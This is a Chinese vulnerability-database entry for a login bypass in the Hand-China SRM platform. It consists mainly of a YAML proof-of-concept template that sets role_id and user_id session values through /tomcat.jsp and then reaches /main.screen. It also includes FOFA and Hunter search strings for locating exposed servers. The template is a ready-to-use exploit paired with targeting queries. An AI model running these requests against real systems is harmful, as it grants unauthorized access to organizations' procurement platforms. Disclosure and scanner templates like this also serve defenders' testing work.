hand-china-srm-tomcat-jsp-login-bypass: 汉得 SRM tomcat.jsp 登录绕过漏洞

日期: 2025-09-01 | 影响软件: Hand-China-SRM | POC: 已公开

漏洞描述

FOFA: 汉得SRM云平台 HUNTER: web.body="汉得SRM"

PoC代码[已公开]

id: hand-china-srm-tomcat-jsp-login-bypass

info:
  name: 汉得 SRM tomcat.jsp 登录绕过漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    FOFA: 汉得SRM云平台
    HUNTER: web.body="汉得SRM"
  tags: hand-china,bypass,login
  created: 2023/09/02

rules:
  r0:
    request:
      method: GET
      path: /tomcat.jsp?dataName=role_id&dataValue=1
    expression: response.status == 200 && response.body.bcontains(b'Server Info:') && response.body.bcontains(b'SRM SERVER Info.')
  r1:
    request:
      method: GET
      path: /tomcat.jsp?dataName=user_id&dataValue=1
    expression: response.status == 200 && response.body.bcontains(b'Server Info:') && response.body.bcontains(b'SRM SERVER Info.')
  r2:
    request:
      method: GET
      path: /main.screen
      follow_redirects: true
    expression: response.status == 200
expression: r0() && r1() && r2()

相关漏洞推荐